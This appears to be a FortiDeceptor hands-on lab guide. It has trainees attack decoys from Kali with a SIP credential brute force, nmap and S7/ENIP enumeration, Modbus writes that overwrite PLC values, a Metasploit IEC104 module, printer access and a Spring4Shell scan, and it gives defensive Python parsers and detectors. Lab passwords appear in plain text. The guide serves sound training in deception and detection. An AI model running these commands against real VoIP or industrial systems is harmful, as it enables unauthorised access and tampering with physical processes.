On FortiDeceptor, view the SIP decoy lures and note down two lure credentials (username and password).
Go to Deception > Decoy Status, select the SIP decoy and click View (the eye icon).

Log in to the Kali terminal using SSH. Go to the Downloads folder; you should see two files: sip_clientv1.py and users.txt.

Edit the users.txt file using the 'nano' tool and add the two lure credentials that you noted down before.
We took the first two in this example:

When you edit the file, make sure that you don't leave whitespace or empty lines in the text file.
Run a brute force attack using the SIP client script, which tries each user:password pair to register with the SIP server.
Issue the command line: python3 sip_clientv1.py 192.168.2.18 5060 users.txt

Note that the script could identify the valid users available on the SIP server from the dictionary file, which could later be used for more sophisticated attacks.
For more details on what the script uses to identify correct SIP usernames, go to the FortiDeceptor Interaction Incidents (it might take a few seconds to appear under Incident > Analysis).
Try to find the following:

• SIP function used: REGISTER
• SIP version used: 2.0
• Username used: entry from the users.txt file
• User-Agent Used: Linphone (popular voip client).
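As an added example (not part of the lab or FortiDeceptor's own code), the following Python parser pulls the same fields out of captured SIP requests that the Interaction incidents above show for the OPTIONS scan and the REGISTER brute force, and flags a source that tries REGISTER for several distinct usernames. The source address 192.168.2.250, the lure usernames and the User-Agent strings are constructed for the sample traffic.

```python
"""Parse SIP requests the way the decoy records them (method, SIP version,
username, User-Agent) and flag dictionary-style REGISTER bursts.
Added example, not FortiDeceptor code; all messages here are constructed."""
import re
from collections import defaultdict

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/(\d\.\d)$")
SIP_USER = re.compile(r"sip:([^@>;]+)@")
ATTACKER = "192.168.2.250"  # constructed source address for the samples


def _sample_request(method, user, agent, seq):
    """Build a constructed SIP request aimed at the lab's SIP decoy."""
    return (
        f"{method} sip:192.168.2.18 SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {ATTACKER}:5060;branch=z9hG4bK-{seq}\r\n"
        f"From: <sip:{user}@192.168.2.18>;tag={seq}\r\n"
        f"To: <sip:{user}@192.168.2.18>\r\n"
        f"Call-ID: {seq}@{ATTACKER}\r\nCSeq: 1 {method}\r\n"
        f"User-Agent: {agent}\r\nContent-Length: 0\r\n\r\n"
    )


# One OPTIONS probe with username "nobody" (as the Metasploit scanner
# sends) followed by REGISTER attempts for three constructed lure users.
SAMPLE_TRAFFIC = [_sample_request("OPTIONS", "nobody", "sipscan/1.0", 1)] + [
    _sample_request("REGISTER", user, "Linphone/4.4", seq)
    for seq, user in enumerate(["lureuser1", "lureuser2", "lureuser3"], 2)
]


def parse_sip_request(raw):
    """Return method, version, From-user, User-Agent and source host of
    one SIP request, or None if the text is not a SIP request."""
    lines = raw.split("\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers = {}
    for line in lines[1:]:
        if not line:          # empty line terminates the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    user = SIP_USER.search(headers.get("from", ""))
    via = headers.get("via", "").split()
    source = via[1].split(";")[0].split(":")[0] if len(via) > 1 else None
    return {
        "method": match.group(1),
        "version": match.group(3),
        "user": user.group(1) if user else None,
        "user_agent": headers.get("user-agent"),
        "source": source,
    }


def enumeration_report(raw_messages, threshold=3):
    """Group requests by source host and flag a host that tries REGISTER
    for at least `threshold` distinct usernames (dictionary behaviour)."""
    per_source = defaultdict(lambda: {"methods": set(), "users": [], "agents": set()})
    for raw in raw_messages:
        req = parse_sip_request(raw)
        if req is None:
            continue
        entry = per_source[req["source"]]
        entry["methods"].add(req["method"])
        if req["user_agent"]:
            entry["agents"].add(req["user_agent"])
        if req["method"] == "REGISTER" and req["user"] and req["user"] not in entry["users"]:
            entry["users"].append(req["user"])
    return {
        src: {
            "methods": sorted(e["methods"]),
            "register_users": e["users"],
            "user_agents": sorted(e["agents"]),
            "possible_enumeration": len(e["users"]) >= threshold,
        }
        for src, e in per_source.items()
    }
```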

Note: This is the end of the SIP-Decoy use case; please delete the SIP-Decoy.
8. Network Attacks: SCADA Decoy (Modbus)
• Deploy the SCADA Decoy and make sure it is up and running as described in section 13.3 (Siemens-S7-200 PLC Decoy Deployment). Please note that this may take some time.
• After successful deployment, the entry under "Decoy Status" should look like this:

FortiDeceptor allows you to deploy OT assets using the SCADAv3 Decoy. We will use Kali to test the SCADA Decoy.

Enumeration testing using nmap:

@kali:~$ sudo nmap -sU -p 161 --script snmp-sysdescr 192.168.2.12

@kali:~$ nmap -Pn -sT -p102 --script s7-enumerate.nse 192.168.2.12 (discover using the S7 protocol)
@kali:~$ nmap --script enip-info -sT -p 44818 192.168.2.12 (discover the ENIP protocol)

Please ignore any error messages in the output; the purpose of these commands is enumeration and verifying the host status.

MODBUS Protocol Testing:

fortideceptor@kali:~$ modbus read 192.168.2.12 %M100 20 (read MODBUS parameter)

@kali:~$ modbus write 192.168.2.12 %M100 1

Modbus values can easily be changed when access is open. For example:

@kali:~$ modbus read 192.168.2.12 %M100 5


@kali:~$ modbus write 192.168.2.12 %M100 0 0 0 0 0
@kali:~$ modbus read 192.168.2.12 %M100 5

Verify the values are overwritten with the new values
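As an added example (not part of the lab or FortiDeceptor's own code), this Python decoder parses the Modbus/TCP requests that the read and write commands above generate and turns every write into an alert, which is what a defender wants from a decoy PLC: nobody legitimate writes to it. It assumes the modbus tool sends %M100 as coil address 100 using function codes 1 (Read Coils) and 15 (Write Multiple Coils), and the attacker address 192.168.2.250 is constructed.

```python
"""Decode Modbus/TCP requests as a SCADA decoy sees them and raise an
alert for every write, since any write to a decoy PLC is hostile.
Added example, not FortiDeceptor code; the request bytes are constructed
here, assuming the lab's %M100 notation means coil address 100."""
import struct

READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}


def _adu(tid, unit, pdu):
    """Prefix a PDU with the MBAP header: transaction id, protocol 0,
    length (unit id byte + PDU), unit id."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def build_read_coils(tid, unit, start, count):
    """Constructed Read Coils (FC 1) request, e.g. modbus read %M100 20."""
    return _adu(tid, unit, struct.pack(">BHH", 1, start, count))


def build_write_coils(tid, unit, start, values):
    """Constructed Write Multiple Coils (FC 15) request, bit-packed LSB first."""
    packed = bytearray((len(values) + 7) // 8)
    for i, v in enumerate(values):
        if v:
            packed[i // 8] |= 1 << (i % 8)
    pdu = struct.pack(">BHHB", 15, start, len(values), len(packed)) + bytes(packed)
    return _adu(tid, unit, pdu)


def decode_modbus_tcp(adu):
    """Parse one Modbus/TCP ADU into function, kind (read/write/other),
    start address, count and, for coil writes, the coil values."""
    if len(adu) < 8:
        raise ValueError("ADU too short")
    tid, proto, length, unit = struct.unpack(">HHHB", adu[:7])
    if proto != 0 or length != len(adu) - 6:
        raise ValueError("malformed MBAP header")
    fc, body = adu[7], adu[8:]
    info = {"tid": tid, "unit": unit, "fc": fc}
    if fc in READ_FUNCTIONS:
        start, count = struct.unpack(">HH", body[:4])
        info.update(kind="read", name=READ_FUNCTIONS[fc], start=start, count=count)
    elif fc == 15:
        start, count, nbytes = struct.unpack(">HHB", body[:5])
        bits = body[5:5 + nbytes]
        values = [(bits[i // 8] >> (i % 8)) & 1 for i in range(count)]
        info.update(kind="write", name=WRITE_FUNCTIONS[fc], start=start,
                    count=count, values=values)
    elif fc in WRITE_FUNCTIONS:
        start = struct.unpack(">H", body[:2])[0]
        info.update(kind="write", name=WRITE_FUNCTIONS[fc], start=start, count=1)
    else:
        info.update(kind="other", name=f"function code {fc}")
    return info


def write_alerts(adus, source, target="192.168.2.12"):
    """Return one alert string per write request seen from `source`."""
    alerts = []
    for adu in adus:
        req = decode_modbus_tcp(adu)
        if req["kind"] == "write":
            alerts.append(f"{source} -> {target}: {req['name']} at {req['start']} "
                          f"count={req['count']} values={req.get('values')}")
    return alerts


# Constructed replay of the lab's commands: read 20 coils, write one coil,
# read 5, overwrite 5 coils with zeros, read 5 again.
SAMPLE_REQUESTS = [
    build_read_coils(1, 1, 100, 20),
    build_write_coils(2, 1, 100, [1]),
    build_read_coils(3, 1, 100, 5),
    build_write_coils(4, 1, 100, [0, 0, 0, 0, 0]),
    build_read_coils(5, 1, 100, 5),
]
```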

This is the end of the Siemens-S7-200 decoy use case; please delete the Siemens-S7-200 decoy.

9. Network Attacks: SCADA Decoy (IEC)
IEC Exploitation:
Note: You will need the Siemens-S7-300 PLC Decoy VM to run this lab. Please deploy SCADAv3 again and select S7-300 PLC from the "Available Deception Decoys", with the same IP address settings used for the Siemens-S7-200 decoy (192.168.2.12).
@kali:~$ msfconsole
msf6 > use auxiliary/client/iec104/iec104
msf6 auxiliary(client/iec104/iec104) > set RHOSTS 192.168.2.12
msf6 auxiliary(client/iec104/iec104) > exploit

Please ignore the returned message and verify the incidents on FortiDeceptor.

This is the end of the Siemens-S7-300 decoy use case; please delete the Siemens-S7-300 decoy.
10. Network Attacks: IoT Decoys
• Deploy the IoT Decoys and make sure they are up and running as described in sections 13.4 (HP Printer IoT Decoy Deployment) and 13.5 (Cisco Router 2691 IoT Decoy Deployment).
• After successful deployment, the entries under "Decoy Status" should look like this:

FortiDeceptor allows you to deploy IoT assets using the IoT Decoys, such as a Cisco router, an HP printer and an IP camera. You can access the Cisco decoy using the Telnet/Web interface and try to read/write the configuration. We will use Kali to test the IoT Decoys.
Enumeration testing using nmap (must be run as the root user via sudo):
@kali:~$ sudo nmap -sS -Pn -T5 -vv <CiscoIOS decoy IP / HP Decoy IP>

@kali:~$ sudo nmap -sU -p 161 --script snmp-sysdescr <CiscoIOS decoy IP / HP Decoy IP>

Enumerating the Printer Decoy:
1. Access the Kali Linux machine $HOME directory (fortideceptor user). From the command line, issue the following commands against the printer decoy:
@kali:~$ cd PRET
@kali:~/PRET$ ./pret.py 192.168.2.13 pjl

2. You get a CLI inside the Printer decoy.


You can also access the decoy via your web browser directly from your desktop or through the Win10 desktop.

3. Verify the incidents in FortiDeceptor and the commands issued. Try the command "print".
4. Now have a look at the Incident > Analysis tab for the IP of the printer decoy. You should see MITRE ICS Techniques with references to the specific segments of the MITRE ATT&CK framework to which the attack/exploit maps.

5. If you move to the Incident > MITRE ICS tab, you will see the exact mappings of the attack.
This is the end of the IoT decoys use case; please delete the HP-Printer and CiscoIOS decoys.

11. Outbreak Alerts for recent vulnerabilities
• Deploy the Outbreak Decoy and make sure it is up and running as described in section 13.8 (Spring4Shell Outbreak Decoy Deployment). Please note that this may take some time.
• After successful deployment, the entry under "Decoy Status" should look like this:

Introduction to the Outbreak Alerts decoy:

When a cybersecurity incident, attack or event occurs that has large ramifications for the cybersecurity industry and affects numerous organizations, FortiGuard Outbreak Alerts are the mechanism for communicating important information to Fortinet's customers and partners.
These Outbreak Alerts help you understand what happened, the technical details of the attack and how organizations can protect themselves from it and others like it.
The FortiDeceptor Deception VM called outbreakv1 provides decoys for the outbreak vulnerabilities that the FortiGuard Outbreak Alerts cover.
For example, you can deploy a network decoy based on FortiGuard Outbreak Alerts such as Spring4Shell, Log4j2 and Exchange, but for this lab we stick to Spring4Shell only.

Preparation for the vulnerability scan:
Connect to Kali Linux using the SSH shell and run the following commands:
@kali:~$ cd Downloads/spring4shell-scan
Note: If this directory does not exist, run the following commands first:
@kali:~$ cd ~/Downloads
@kali:~$ git clone https://github.com/fullhunt/spring4shell-scan.git
@kali:~$ cd ~/Downloads/spring4shell-scan

Launch the vulnerability scan from Kali:

1. Make sure you are in the right folder (spring4shell-scan) by running the command pwd.

2. Use python to start the script, targeting the outbreak decoy on FortiDeceptor:
@kali:~/Downloads/spring4shell-scan$ python3 spring4shell-scan.py -u https://192.168.2.17

Note that the scan tool will find no vulnerability. This is on purpose, as FortiDeceptor (FDC) does not mimic a full OS. For Outbreak Alerts, FDC checks whether the URL requests match the vulnerability and reports them back to Incident Analysis.

3. Check the Incident > Analysis on FortiDeceptor that the scan was identified and correctly reported.
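As an added example (not part of the lab or FortiDeceptor's own code), here is the kind of URL-matching check the note above describes, written in Python over constructed web-server log lines: it flags requests whose parameter names reach into the Spring class loader, which is the public indicator for Spring4Shell (CVE-2022-22965), while the page serving them is never vulnerable. The log lines, timestamps and the source address 192.168.2.250 are constructed.

```python
"""Flag HTTP requests that probe for Spring4Shell (CVE-2022-22965) the way
an outbreak decoy does: the page is never vulnerable, it just matches the
request. Added example, not FortiDeceptor code; the log lines and the
source address are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Public Spring4Shell probes and exploits bind request parameters onto the
# bean's class loader, so the parameter *name* is the stable indicator.
SPRING4SHELL_MARKER = "class.module.classloader"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed combined-format access log: one benign hit, two scanner
# probes (the second percent-encodes the first letter), one benign search.
SAMPLE_LOG = """\
192.168.2.250 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.168.2.250 - - [01/Jan/2024:10:00:02 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=probe HTTP/1.1" 200 12
192.168.2.250 - - [01/Jan/2024:10:00:03 +0000] "POST /login?%63lass.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt HTTP/1.1" 400 0
192.168.2.200 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=classloader+docs HTTP/1.1" 200 77
"""


def suspicious_params(target, body=""):
    """Return decoded parameter names (query string plus optional form body)
    that reach into the class loader; percent-encoded names are decoded."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    hits = []
    for name, _ in pairs:
        decoded = unquote_plus(name).lower()  # second decode catches %25 double encoding
        if SPRING4SHELL_MARKER in decoded:
            hits.append(decoded)
    return hits


def detect_spring4shell(log_lines):
    """Scan access-log lines and return one record per request whose
    parameter names match the Spring4Shell indicator."""
    findings = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        src, when, method, target, status = m.groups()
        params = suspicious_params(target)
        if params:
            findings.append({"source": src, "time": when, "method": method,
                             "path": urlsplit(target).path, "status": int(status),
                             "params": params})
    return findings
```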

12. Fabric Integration
FortiDeceptor's ability to create a fabricated network of decoys across both IT and OT segments enables the detection of
external and internal threat actors across a broad surface.
By integrating analytics, driven by AI-based detection, FortiDeceptor provides an unambiguous early warning of an
impending threat campaign. Through Security Fabric integration, FortiDeceptor automatically triggers a policy action with
inline security controls, so containment of the threat is undertaken as part of the threat response.
This exercise will simulate a threat actor detection and mitigation automation by using the integration between the
FortiDeceptor and the FortiGate.
Let's configure the integration on the FortiDeceptor side:
1. Go to Fabric > Quarantine Integration
2. Configure the following parameters:

Name: fgtblocker
Block Severity: Check all (Low, Medium, High, Critical)
Integrate Method: FGT-REST-API
IP: 192.168.0.2
Port: 443
Username: fortideceptor
Password: FortiDeceptor12#
3. Press Save and verify that the Enabled and Ready status shows a positive connection to the FortiGate.

4. To trigger a mitigation action, we need to simulate an attack against one of the Decoys. Access the KALI BOX over SSH and check that you can reach the Internet by pinging Google's DNS servers.
@kali:~$ ping 8.8.8.8

5. Now we use nmap to run a port scan that triggers the quarantine action for the KALI BOX:
@kali:~$ sudo nmap -F -sV 192.168.2.17

6. After the scan has finished, check on FortiDeceptor > Fabric > Quarantine Status that the KALI BOX has been placed in quarantine.

7. This status is synced via the Fabric upstream to the FortiGate, which now blocks the Internet connection for that host. Verify this by pinging Google DNS again; there should be no reply. Keep the ping running.
8. Go back to FortiDeceptor > Fabric > Quarantine Status, select the quarantined host and click the Unblock button to release the host from quarantine.

9. This status is synced to the FortiGate, and the running ping on the KALI BOX should start to get replies again.

13. Decoy Deployment
13.1 Windows Decoy Deployment
To deploy the Windows Decoy VM in the deployment network:
a. From the FortiDeceptor web console, go to Deception > Deployment Wizard.
b. Under Please select a template to start with: click the add (+) icon.

c. Configure the following settings:
Name: Win10
Available Deception OSes: win10v1
Selected Services: Keep as is
Automate Lures: Click Generate Lures to generate the lures automatically using the "any" tag.
RDP: Leave Enabled
SMB: Leave Enabled
TCPlistener: Disable
NBNSSpoofSpotter: Disable
ICMP: Disable
FTP: Disable
Launch Immediately: Enable
Reset Decoy: Disabled (In production, this feature resets the Decoy after attacker engagement, based on a specified time.)

d. Click Next to advance to the Set Network section in the decoy deployment wizard, and configure the Decoy
networking settings:

The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.

e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:


Deploy Network: port2 (subnet 192.168.2.100/24)
Addressing Mode: Choose whether the Decoy gets a static IP or DHCP. In this environment we use STATIC configuration only.
Network Mask: Keep as 255.255.255.0
Gateway: Enter the deployment network default gateway (192.168.2.1)
MAC Address OUI: Leave empty. FortiDeceptor will choose a MAC address automatically.
IP Count: Number of IP addresses to assign to Decoys. Configure as 1 for this exercise.
Min: Keep as is
Max: Keep as is
IP Ranges: Enter the IP address range from which FortiDeceptor can configure the Decoy IP addresses. For this example, configure as follows: 192.168.2.11
Decoy Interface Configuration example: configuration for 1 Decoy IP address

f. Click Done to close the popup window.
g. Click Deploy to deploy the Decoy.
h. You should be redirected automatically; otherwise, from the FortiDeceptor web console, go to Deception > Decoy Status. You should see the Decoy you configured with the status Initializing.

Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.

Use the Actions menu to:
• View the Decoy VM Configuration
• Copy the configuration to a template
• Stop the Decoy VM
• Delete the Decoy VM

13.2 Linux Decoy Deployment
To deploy the Linux Decoy VM in the deployment network:
a. From the FortiDeceptor web console, go to Deception > Deployment Wizard.
b. Under Please select a template to start with: click the add (+) icon.

c. Configure the following settings:

Name: Linux-Decoy
Available Deception OSes: ubuntu16v1
Selected Services: Keep as is
Automate Lures: Click Generate Lures to generate the lures automatically using the "any" tag.
TCPlistener (0): (Optional) Add a custom TCP port to the Decoy, e.g. 555. If no port is noted, disable the TCPListener.
HTTP: Enable
HTTPS: Disable
GIT: Disable
ICMP: Enable
FTP: Disable
Launch Immediately: Enable
Reset Decoy: Disabled (In production, this feature resets the Decoy after attacker engagement, based on a specified time.)

d. Click Next to advance to the Set Network section in the decoy deployment wizard, and configure the Decoy
networking settings:

The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.

e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:


Deploy Network: Choose the deployment network interface
Addressing Mode: Choose whether the Decoy gets a static IP or DHCP. In this environment we use STATIC configuration only.
Network Mask: Keep as 255.255.255.0
Gateway: Enter the deployment network default gateway (192.168.2.1)
MAC Address OUI: Leave empty. FortiDeceptor will choose a MAC address automatically.
IP Count: Number of IP addresses to assign to Decoys. Configure as 1 for this exercise.
Min: Keep as is
Max: Keep as is
IP Ranges: Enter the IP address range from which FortiDeceptor can configure the Decoy IP addresses. For this example, configure as follows: 192.168.2.10-192.168.2.20
Decoy Interface Configuration example: configuration for 11 Decoy IP addresses (range)

f. Click Done to close the popup window.
g. Click Deploy to deploy the Decoy.
h. You should be redirected automatically; otherwise, from the FortiDeceptor web console, go to Deception > Decoy Status. You should see the Decoy you configured with the status Initializing.

Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.

Use the Actions menu to:
• View the Decoy VM Configuration
• Copy the configuration to a template
• Stop the Decoy VM
• Delete the Decoy VM
• Attack Test: To make sure the Decoy is accessible

13.3 Siemens-S7-200 PLC Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples (13.1 and 13.2) while applying the following settings:
• Name: Siemens-S7-200
• Deception OS: scadav3
• IP: 192.168.2.12
• On the HTTP and S7COMM services: set the decoy parameters to the values listed in the figure.

13.4 HP Printer IoT Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: HP-Printer
• Deception OS: iotv1
• IP: 192.168.2.13
• SNMP Community: "FDCCommunity"
• Jetdirect: Enable
• Printer-WEB: Enable

13.5 Cisco Router 2691 IoT Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: CiscoIOS
• Deception OS: iotv1
• IP: 192.168.2.14
• Select Model: 2691
• SNMP Community: "FDCCommunity"
• For the Cisco router we need to use a real Cisco IOS image for the decoy simulation. Please download a Cisco IOS sample from the link below:
• https://fortinet.egnyte.com/dl/wn22uc1Ko4
• Password: QaRqm35R
• Download cisco ios.zip
• Unzip cisco ios.zip and upload the .bin file independently; select any of the 3 images
• The zip file doesn't contain a sample-config configuration file, as it is not needed for this lab, but if a customer has one, it can be loaded when creating a decoy

Note: This is an exclusive Fortinet router image, in real deployments, customers need to upload their own images.

13.5 Cisco Router 2691 IoT Decoy Deployment
This is a sample config for the Router Decoy.

13.6 Tomcat Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: Tomcat-Decoy
• Deception OS: ubuntu18v1
• IP: 192.168.2.15
• Tomcat HTTP: Enabled (port 8080)
• Tomcat HTTPS: Enabled (port 8443)

13.7 SQL Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: SQL-Decoy
• Deception OS: ubuntu18v1
• IP: 192.168.2.16
• MariaDB: Enabled
• Listening Port: 3306
• Database Name: CustomerDB
• Generate lures

Click on Sample to download the sample SQL schema.

13.8 Spring4Shell Outbreak Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: Spring4Shell
• Deception OS: outbreakv1
• Available Deception Decoys: spring4shell_decoy
• IP: 192.168.2.17
• SPRING4SHELL ALERT: Enable

13.9 SIP Decoy Deployment
Follow the Deployment Wizard steps as described in the previous examples while implementing the following settings:
• Name: SIP-Decoy
• Deception OS: voipv1
• Available Deception Decoys: SIP Decoy
• IP: 192.168.2.18
• Generate Lures
• SIP: Enabled
• Use the default TCP/UDP ports

14. Cleanup
After you have finished all labs, please complete the following 2 steps:
1. Reset FortiDeceptor back to default settings
2. Uninstall the Token package from the Windows machine
FortiDeceptor
• Delete the Quarantine Integration and press Apply.

• Log in via the CLI, using the same credentials as for the UI login, and perform a data purge. After running the command, type 'y'; the FortiDeceptor unit will clean all data and reboot.
data-purge -a

Windows Device
• RDP to 192.168.2.200
• Go to Downloads, find the extracted Token Package and, under the windows folder, execute uninstall.bat

• Once the files are removed from the Downloads folder, delete the zip file.

END – OF – LABS
Thank you for participating in this Hands-On-Lab.

You may log-off the lab environment now.
